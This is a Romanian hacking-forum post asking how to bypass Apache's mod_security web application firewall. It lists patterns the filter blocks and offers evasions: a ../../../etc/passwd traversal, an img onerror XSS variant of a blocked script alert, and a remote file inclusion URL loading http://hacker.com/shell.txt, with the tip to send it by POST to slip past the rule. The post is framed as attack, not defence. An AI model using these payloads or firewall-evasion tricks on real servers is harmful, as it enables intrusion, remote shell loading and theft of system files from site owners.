Jump to content
moubik

apache mod_secure cum sa trecem de el/ ce blocheaza ?

Recommended Posts

nu am configurat niciodata un mod_secure pentru apache.

din cate am citit, i se creaza niste reguli pe baza carora blocheaza request-urile.

as vrea sa facem o lista cu ce blocheaza de obicei (lista default), si cum sa trecem de acestea.

cand blocheaza mod_secure apare o pagina in genul acesta:

Not Acceptable

An appropriate representation of the requested resource / could not be found on this server.

Apache/1.3.37 Server at www.site.com Port 80

blocheaza:

-request-rile /etc/passwd si toate de genul ../../../etc/passwd - nu stiu cum sa bypass asta

- <script>alert(1)</script>

# se poate face bypass cu <img=http:// onerror="alert(1)">

-daca sunt 2 "?" in url

stim ca asta apare atunci cand incercam sa facem un rfi, si astfel url-ul arata in genul:

http://www.vulnerable.com/index.php?page=http://hacker.com/shell.txt?

# asteia ii fac bypass cu un script php ce foloseste doar POST, in loc de GET

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...